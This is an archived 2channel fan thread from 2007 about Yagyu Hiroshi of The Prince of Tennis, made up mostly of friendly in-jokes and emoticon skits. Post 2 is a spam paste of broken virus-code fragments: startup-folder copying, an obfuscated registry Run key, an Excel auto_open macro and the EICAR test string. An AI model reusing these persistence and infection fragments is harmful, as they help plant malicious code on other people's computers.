2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【テニスの】テニプリ 柳生比呂士に萌えるスレ【紳士様】

1 :名無しかわいいよ名無し:2007/10/30(火) 19:41:56 ID:DKk5yocd
立海のジェントルマン、柳生比呂士に萌えるスレです。


(`.∀´)<前スレが落ちたんで建てたぜよ。親友のスレがないのは遊びに行けんでさびしいからのぉ。

(スレタイは前のままです。
 圧縮かかりやすいみたいなので一日一ageしたほうがいいのかな?
 他に何かテンプレとかあったら誰か頼むorz)

2 :名無しかわいいよ名無し:2007/10/30(火) 19:57:20 ID:FcDckT1f
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :名無しかわいいよ名無し:2007/10/30(火) 20:53:39 ID:r70iEdx0
テンプレないが保守。
今まで残ってたのにびっくりした。

4 :名無しかわいいよ名無し:2007/10/31(水) 00:57:25 ID:sfj5OB39
(; 〇ω〇)落ちやすくなりましたね。

5 :名無しかわいいよ名無し:2007/10/31(水) 01:36:33 ID:SorxsGt0
落ちてて焦った…;;
1乙
しかしテンプレないorz スマソ

6 :名無しかわいいよ名無し:2007/10/31(水) 02:33:40 ID:+3hGRrQP
落ちないと思ったのにね〜(・ω・`)
これからもまったりピロシ萌え話しようじゃないか!

7 :名無しかわいいよ名無し:2007/10/31(水) 19:10:52 ID:GsJA52rc
( ゚∀゚)<ageるっス!

8 :名無しかわいいよ名無し:2007/10/31(水) 19:21:07 ID:OCx8R1E3
>>1
乙です!
復活して良かった

9 :名無しかわいいよ名無し:2007/10/31(水) 19:34:20 ID:9lhCIIqg
>>1

10 :名無しかわいいよ名無し:2007/10/31(水) 22:52:36 ID:0axElHBG
今週紳士が出てきてうれしかったよ

11 :名無しかわいいよ名無し:2007/11/01(木) 22:13:57 ID:ffKU9kvN
しゃべってくれて嬉しかったよ紳士!

12 :名無しかわいいよ名無し:2007/11/01(木) 22:55:07 ID:DA6esDlF
>>1
本当に乙です!

13 :名無しかわいいよ名無し:2007/11/02(金) 20:03:09 ID:65AlfGk1
(`.∀´)<ageるぜよ

14 :名無しかわいいよ名無し:2007/11/02(金) 20:09:19 ID:liD7i5mi
>>1乙。
過去ログ漁ってみたけどテンプレってほどのテンプレはないみたいだね。
前スレは「前スレ落ちたので立てた」って奴だし。
一応初代スレの>>1のコピペ↓
−−−−−−−−−−

立海大付属の紳士こと柳生比呂士を愛でるスレです

性格:紳士
特技:変装(仁王や海堂に変装できるので)

15 :名無しかわいいよ名無し:2007/11/04(日) 03:38:46 ID:uiNgxWMy
保守

16 :名無しかわいいよ名無し:2007/11/04(日) 12:49:02 ID:TeM/S1UN
紳士もっと出て><

17 :名無しかわいいよ名無し:2007/11/04(日) 12:55:21 ID:mq+pUMTf
というか紳士に試合させたげて・・・

18 :名無しかわいいよ名無し:2007/11/04(日) 19:47:29 ID:n9gFNrld
>1乙!

久しぶりに覗こうって思ってたら落ちてたんで驚いた。
真田といい仁王といい、落ちやすくなっているな。
決勝戦、柳生の出番はあるかな?

19 :名無しかわいいよ名無し:2007/11/04(日) 21:59:58 ID:O6AdMQBf
出ないと思う。出ても次は青学が勝つだろうしな

20 :名無しかわいいよ名無し:2007/11/05(月) 01:05:49 ID:jPkPXDSd
最後の試合があれか…

21 :名無しかわいいよ名無し:2007/11/05(月) 18:24:15 ID:xq+STWzq
…あっけなくて寂しいね、そうだとしたら……

22 :名無しかわいいよ名無し:2007/11/06(火) 12:00:40 ID:DbWWObVD
出るならダブルスだよな

23 :名無しかわいいよ名無し:2007/11/06(火) 17:53:16 ID:LBgMQidd
今週もピロシ喋ってて嬉しかった
不二vs仁王戦が終わって次はどうなることやら…

どうでもいい呟きだがスペシャルブロマイドのスキーウェアを着たピロシに萌えますた
今週のジャンプは見ることを勧めるよ

24 :名無しかわいいよ名無し:2007/11/06(火) 18:16:29 ID:mVVXaSAN
スキーウェア見たけどあれはヤバい、是非レクチャーして頂きたい
つか眼鏡がゴーグルになりそうw

25 :名無しかわいいよ名無し:2007/11/08(木) 19:30:33 ID:9dX+4nUk
本誌ヒロシの立ち姿に惚れボレーする
背から腰のラインが妙に艶かしい気がするのは私だけか

26 :名無しかわいいよ名無し:2007/11/09(金) 21:11:00 ID:AQwDk6Lo
たしけの描く身体のラインは結構色気あるよね
あと髪の流れ方が美しくて好きだな


27 :名無しかわいいよ名無し:2007/11/10(土) 06:00:01 ID:fGdUEqvk
      Oノ
      ノ\_・'ヽO. >>25
       └ _ノ ヽ
           〉


28 :名無しかわいいよ名無し:2007/11/10(土) 10:00:44 ID:IdV6dWHy
バネさん出張ツッコミ乙ww 
柳生は脚が細いところが色っぽいよ。美脚(*´Д`*)

29 :名無しかわいいよ名無し:2007/11/10(土) 14:47:07 ID:F8O/yLef
バネさんww
自分は海堂と入れ替わりした時のタンクトップ姿に萌えまくった
脚でてるし腕が美しすぎる・・・
へんたいスマソ

30 :名無しかわいいよ名無し:2007/11/10(土) 18:25:33 ID:wOioAGCZ
たいへんなへんたい
だがたしかにあのタンクトップ姿は良かったな
柳生のあーゆー格好貴重だし、あの色の白さがまたなんともたまらんかったw

31 :名無しかわいいよ名無し:2007/11/10(土) 19:32:29 ID:fGdUEqvk
      Oノ
      ノ\_・'ヽO. >>29
       └ _ノ ヽ
           〉
せっかく千葉まで戻ったのにすぐさま呼ぶンじゃねぇ!

32 :春風:2007/11/10(土) 19:43:01 ID:WK0zCYKb
   Oノ
   ノ\_・’ヽO.←>>31 
    └ _ノ ヽ
        〉
偽物だな。29じゃなくて30だろ!!

33 :名無しかわいいよ名無し:2007/11/10(土) 19:49:39 ID:F8O/yLef
ちょw
おまいら喧嘩すんなww

34 :名無しかわいいよ名無し:2007/11/11(日) 13:38:59 ID:Veh4FhA2
たった10分半でツッコミにくる本物バネさんwww

だが柳生スレだよな、ここwwwうつつ抜かしちゃいけないなw

35 :名無しかわいいよ名無し:2007/11/11(日) 23:22:15 ID:tbTVHngt
紳士スレはいつみても和むww

36 :名無しかわいいよ名無し:2007/11/12(月) 17:41:46 ID:dMp+7qXH
紳士素敵だよ紳士

37 :名無しかわいいよ名無し:2007/11/12(月) 22:01:41 ID:9pzzak0/
比呂士出番ないよ比呂士・・・

38 :名無しかわいいよ名無し:2007/11/12(月) 22:08:39 ID:11XKud3c
ぴろし試合あるといいねぴろし・・・!

39 :名無しかわいいよ名無し:2007/11/12(月) 22:24:03 ID:7O3jEwrC
(元)相方を慰めに行ってくれないかな紳士

40 :名無しかわいいよ名無し:2007/11/13(火) 17:14:44 ID:G9OmOnH4
何かの手違いで試合はあるんだよ…!
じゃないと本気で泣く

41 :名無しかわいいよ名無し:2007/11/13(火) 18:51:34 ID:qf9tlmso
ずっと思ってたんだけどこのスレで仁王との話ばかりするのやめてほしい
柳生個人スレなのに嫌いなキャラの名前ばかり見るのはつらい…

42 :名無しかわいいよ名無し:2007/11/13(火) 19:06:19 ID:eT/HexBS
>>41
落ち着いてよく見てください
ほぼ柳生の話でできてますよ、このスレは

43 :名無しかわいいよ名無し:2007/11/13(火) 19:35:31 ID:SJEmCbFS
ここ、まったり萌え話してて大好きなスレなんだけどなぁ…(◯ω◯`)
沢山の人が誕生日祝ってたり、バネさんが出張つっこみに来てくれてたり、本当に良い和み場だと思うんだ。 
他キャラが嫌いとか言うのはなるべく控えようね?

44 :名無しかわいいよ名無し:2007/11/13(火) 19:40:34 ID:SJEmCbFS
連書きスマソ
誕生日祝いカキコがあったのは落ちた前スレだったね…(´Å`)

45 :名無しかわいいよ名無し:2007/11/13(火) 21:14:18 ID:Hqh6SuyU
紳士の相方がプリッなんだから話に出てくるのはもはや必然的だと思う
プリ好きの人だってここにいるんだろうから「嫌い」っていう言葉は控えた方がよさげ(43と言ってること同じでスマソ)

とりあえず紳士について萌えようじゃまいか
黒飴ネタも落ちた前スレにあるんだよね、なんか悲しい…orz

46 :名無しかわいいよ名無し:2007/11/13(火) 21:22:27 ID:fPo8yeNk
>>45
43と言ってる事同じ…の43を榊(43)の事かと思い「あれ?このスレに榊来た事あったっけ…」と一時考えこんでしまった事は秘密だ。

黒飴ネタは勿体なかったな。
お年寄りに親切な柳生とか、私と同じビジョン持ってる人達が多くて嬉しかったんだが。

47 :名無しかわいいよ名無し:2007/11/13(火) 23:16:27 ID:Hqh6SuyU
>>46
すまない
自分で書き込んだくせにまったく同じ事を思ってしまったさ。

実は黒飴苦手なピロシが今は懐かしい…

48 :名無しかわいいよ名無し:2007/11/14(水) 01:40:26 ID:ONP9PdHp
>>45の提案を榊(43)風に変えてみた。(※小杉voiceに脳内変換してお読み下さい)

「柳生のパートナーが仁王なのだから話に出てくるのはもはや必然的と言えるだろう。
仁王に好意的な者もここにいるだろうから、「嫌い」という言葉は控えるのが賢明だ。
とりあえず柳生について萌えようではないか。
では、いってよし!」


そして
(*○ω○)< 流石は氷帝を束ねる名監督、至言です!
と素直に感嘆する柳生。

49 :名無しかわいいよ名無し:2007/11/14(水) 01:55:12 ID:27U0E5Ov
>>48
完璧に小杉ボイスで再生された



何となく紳士と43って意外と気が合うんじゃないかと、ふと思った

50 :名無しかわいいよ名無し:2007/11/14(水) 06:42:23 ID:3cbJ5Tfe
>>48
ちょww

51 :名無しかわいいよ名無し:2007/11/14(水) 09:33:15 ID:65n9uU82
2人はゴルフ仲間でおk

52 :名無しかわいいよ名無し:2007/11/14(水) 11:53:16 ID:VwWX1vMK
なんでここはこんなにも和む場所なんだ
良い人ばかりで泣けてくるww

お気に入りのゴルフ場(練習場?)でばったりかち合わせちゃったりしてそこから話が弾んでいきそうだな
…監督がゴルフをやっている姿を想像しようとしたらうっかりゲートボールしてる姿が思い浮かんだorz
監督は無理でもピロシならゲートボールもありだと思う自分は自重すべきか…

53 :名無しかわいいよ名無し:2007/11/14(水) 15:48:29 ID:owN+HweI
OVAコメンタリーの紳士はいちいち可愛い...
「あなたも同じようなものですぅ!!」に萌

54 :名無しかわいいよ名無し:2007/11/15(木) 11:15:05 ID:jIRJT1zR
電信文書と電信住所には吹いた

55 :名無しかわいいよ名無し:2007/11/15(木) 12:21:38 ID:E12cW4fm
紳士上げ

56 :名無しかわいいよ名無し:2007/11/15(木) 12:26:42 ID:O1zjlGHO
紳士が鬼畜眼鏡って言われたのにはワロタw

57 :名無しかわいいよ名無し:2007/11/15(木) 17:04:11 ID:lOHz1PdR
ブン太にヒロシ呼びされてたりwww仲良いんだな〜って思った。
 
あと他の人と入れ代わりして、仁王が妬いてたりね
 
いじられてる柳生かわいい(*´ω`*)

58 :名無しかわいいよ名無し:2007/11/15(木) 19:19:51 ID:o81X18Pt
完璧じゃない紳士萌えw
音楽でコーダーの高音で変な音出しちゃったりしてたらどうしようw


59 :名無しかわいいよ名無し:2007/11/15(木) 22:08:00 ID:ViQylFha
>>58
“リコーダー”と修正せずに読んでしまった
故に合唱か何かの練習でコーダマークをすっ飛ばして一人だけ違う節歌ってたらどうしようw
という話にしてしまいかけたw

60 :名無しかわいいよ名無し:2007/11/16(金) 00:47:31 ID:zXF4Uppo
>>59
気付かずに気持ち良さそうに歌い続けてほしいwww

61 :名無しかわいいよ名無し:2007/11/16(金) 21:11:25 ID:3M42Lm5L
>>60
同感だw

62 :名無しかわいいよ名無し:2007/11/16(金) 22:35:41 ID:e0vKEOuA
ニャーーニャニャニャラーーーン♪♪(*`α´*)(*◯ω◯*)(*`.∀´*)(O゚`・Д・)♪♪
ニャオーー(*◯∀○*)ーー♪♪♪??!Σ(・α・´;)(-д-`?)(`.∀´){ブッ!
ニャントゥルットゥ…(◯∀○`Σ⊂∬`υ´#∬バシッ
(;`ΩωΩ)?!何故???
 
パート間違えてても自覚しないんだろうなw

63 :名無しかわいいよ名無し:2007/11/17(土) 12:17:21 ID:ZyoomfWi
誤字すんまそん。
合唱の時に一人異常に声でかくて浮きそうw


64 :名無しかわいいよ名無し:2007/11/17(土) 12:52:55 ID:kcwG6HsJ
むしろみんなピロシの美声に酔いしれてまえw

65 :名無しかわいいよ名無し:2007/11/18(日) 10:55:05 ID:qvTi4+HU
age

66 :名無しかわいいよ名無し:2007/11/18(日) 13:49:14 ID:4V2DeC07
18番は「エーデルワイス」とか

67 :名無しかわいいよ名無し:2007/11/20(火) 09:04:34 ID:N/GViThd
保守

68 :名無しかわいいよ名無し:2007/11/20(火) 19:01:19 ID:jbhZSiMi
エーデルワイスw
校歌を真面目に歌う中学生は真田と柳生くらいだと思う。

69 :名無しかわいいよ名無し:2007/11/21(水) 22:54:53 ID:dhDrukm3
100曲マラソンおめ!!

70 :名無しかわいいよ名無し:2007/11/21(水) 23:03:34 ID:WURhL+Kb
無駄に上手い柳生www

71 :名無しかわいいよ名無し:2007/11/22(木) 00:54:58 ID:jinn0LjH
ミュージカルのCDのブックレットにあるアニメの柳生の画像がかっこいいんだがどこのシーンだろう

72 :名無しかわいいよ名無し:2007/11/23(金) 00:04:03 ID:3bdFEGS8
ちょwwwwwwwwこれはwwwwwwwwwww

http://www.nicovideo.jp/watch/sm1586485

73 :名無しかわいいよ名無し:2007/11/23(金) 10:07:00 ID:GtTjetnq
チャレンジャーだなぁw

74 :名無しかわいいよ名無し:2007/11/23(金) 11:06:26 ID:q1q5iNuJ
ぴろしの髪がひどすぎるwww

75 :名無しかわいいよ名無し:2007/11/23(金) 20:12:04 ID:GtTjetnq
見直してきたらもってけも踊ってたね
紳士gdgdすぎるw

76 :名無しかわいいよ名無し:2007/11/23(金) 20:37:19 ID:2GVz209J
らきすたwww


77 :名無しかわいいよ名無し:2007/11/24(土) 23:15:36 ID:Fe6XkcHF
age

78 :名無しかわいいよ名無し:2007/11/25(日) 03:48:04 ID:7EbJc9jW
おちゃめな紳士もいいと思います

79 :名無しかわいいよ名無し:2007/11/25(日) 04:33:06 ID:CJqbUTUb
よく見ると栗鼠に似てるな〜…原作の髪色は茶色だし!ほっぺを突きたいもんだ。
ピロシは嫌がって涙目で怒るんだろなぁ(´ー`)

80 :名無しかわいいよ名無し:2007/11/26(月) 01:37:50 ID:+jkMyaq8
(;〇ω〇)ちょ!人の頬をつつくのはやめなさい!

81 :名無しかわいいよ名無し:2007/11/26(月) 05:54:14 ID:G9BfMFT+
そこは「やめたまえ!」でしょうw
朝から和んだ

82 :名無しかわいいよ名無し:2007/11/26(月) 14:37:25 ID:Vsgr48f6
>>79>>80
あ・・・頬っぺの中から大量の黒飴が・・・(||○Д○)=(((●●●●●● ● ●

83 :名無しかわいいよ名無し:2007/11/26(月) 16:50:44 ID:RKo2ovwc
(;`◯ω◯)=(((●●●●●●●●  (・α・)
 
(*  `α´  *)モリモリモリッ!!!
(;◎ω◎)!!?
黒飴は丸井くんの口の中へ入って行きました―

84 :名無しかわいいよ名無し:2007/11/27(火) 02:02:08 ID:We6FlYDB
>>83
丸井くん落ち着いて>>82を見てください。
黒飴の出どころは…














(;;゚;;α;;゚;;)

85 :名無しかわいいよ名無し:2007/11/29(木) 10:10:41 ID:9naa5J7w
( 〇ω〇)

86 :名無しかわいいよ名無し:2007/11/30(金) 00:45:26 ID:hpOIyOVK
( 〇ω〇)( 〇ω〇)

87 :名無しかわいいよ名無し:2007/11/30(金) 02:50:22 ID:e482o6ni
( ○ω○)( ○ω○)( ○∀○)

88 :名無しかわいいよ名無し:2007/11/30(金) 23:05:09 ID:KOvcYi3M
どれか持って行ってもばれないよね…?

89 :名無しかわいいよ名無し:2007/12/01(土) 01:08:03 ID:H+3n9T1i
( ○ω○)一番上は柳生(柳生)♪
( ○∀○)一番下も柳生(多分)♪
( ○ω○)間に挟まれ柳生(柳生)♪

( ○ω○)( ○ω○)( ○∀○) 柳生三兄弟♪

90 :名無しかわいいよ名無し:2007/12/01(土) 03:18:06 ID:0JWNzrIh
またなんて懐かしい歌をww
( ○∀○)は忍足じゃないのか?
わかりません><




91 :名無しかわいいよ名無し:2007/12/01(土) 15:26:42 ID:7ZWfVSwS
多分てなんだ、多分てw
どれかをポケットに入れて叩けば増えるかな…

92 :名無しかわいいよ名無し:2007/12/01(土) 16:14:14 ID:+qbQuidH
ポケットの中には柳生が一匹(◯ω◯)♪
もひとつ叩けば柳生が繁殖(´◯ω◯`)(*◯ω◯*)(#`◯ω◯)(ΘωΘ)zZ...(〇α○)〃(◎ω◎)!(ΩωΩ`)(*■ー■)b(*●ω●*)(εωε)

93 :名無しかわいいよ名無し:2007/12/01(土) 17:32:49 ID:708x+ZtL
たしけ混ざっとるwwwwww

94 :名無しかわいいよ名無し:2007/12/02(日) 12:20:27 ID:v6exomTq
じゃあ>>85の柳生は貰っていきますね

95 :名無しかわいいよ名無し:2007/12/02(日) 14:09:59 ID:y2qzYjPe
じゃあ私はたしけを頂いて、柳生の大量生産に乗り出しますね

96 :名無しかわいいよ名無し:2007/12/02(日) 15:21:53 ID:2bwMTJld
じゃぁ私は>>95が大量生産した柳生を全部頂きますね

97 :名無しかわいいよ名無し:2007/12/02(日) 16:29:22 ID:hRgaNh3N
柳生はヨーグルト並に発酵可能なのかwww

98 :名無しかわいいよ名無し:2007/12/02(日) 20:15:21 ID:J7wXT0Bc
age ( ○ω○)

99 :名無しかわいいよ名無し:2007/12/03(月) 04:16:50 ID:maSgnnXr
( 〇ω〇)かもしますよ

100 :名無しかわいいよ名無し:2007/12/03(月) 16:54:18 ID:Zw+nYHD6
柳生先輩〜ネズミの国から帰ったっス!
はいお土産のミ。キーさんの耳っ●●

101 :名無しかわいいよ名無し:2007/12/03(月) 17:22:49 ID:8qSjcchQ
つ●●⊂(○ω○*) わざわざありがとうございます。
これは立派な黒飴ですね!

102 :名無しかわいいよ名無し:2007/12/03(月) 17:31:36 ID:Lh3aiQj4
● ●
(*〇ω〇)どうでしょうか?

103 :名無しかわいいよ名無し:2007/12/03(月) 18:37:51 ID:UdzmQayu
(*〇ω、〇)モグモグ‥なかなかの黒飴です。

104 :名無しかわいいよ名無し:2007/12/03(月) 18:48:33 ID:ULPsRu92
ちょ、耳なのか黒飴なのかはっきりしろピロシw

105 :名無しかわいいよ名無し:2007/12/03(月) 20:48:09 ID:VfEtQSCx
ピロシのだけ黒飴で出来きていたんだ…
赤也にしては気がきいてるww

106 :名無しかわいいよ名無し:2007/12/03(月) 21:56:24 ID:Zw+nYHD6
六角中の皆から貰ったっス!
つ苺のパンツ

107 :名無しかわいいよ名無し:2007/12/03(月) 23:50:38 ID:ZzxezdkN
柳生ってパンツは何タイプなんだろうね。やっぱりベタにブーメランかな。

108 :名無しかわいいよ名無し:2007/12/04(火) 01:22:22 ID:MygDA+j2
お母さんが買ってきた、動物プリントパンツだよ!
しかも刺繍で名前付けてある
 
(;´〇ω○)母様、私もう中三…いえ、文句など言えませんね!履きます!!(泣)

109 :名無しかわいいよ名無し:2007/12/04(火) 08:16:00 ID:RJN1X1/q
そこは文句言えよ!笑

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)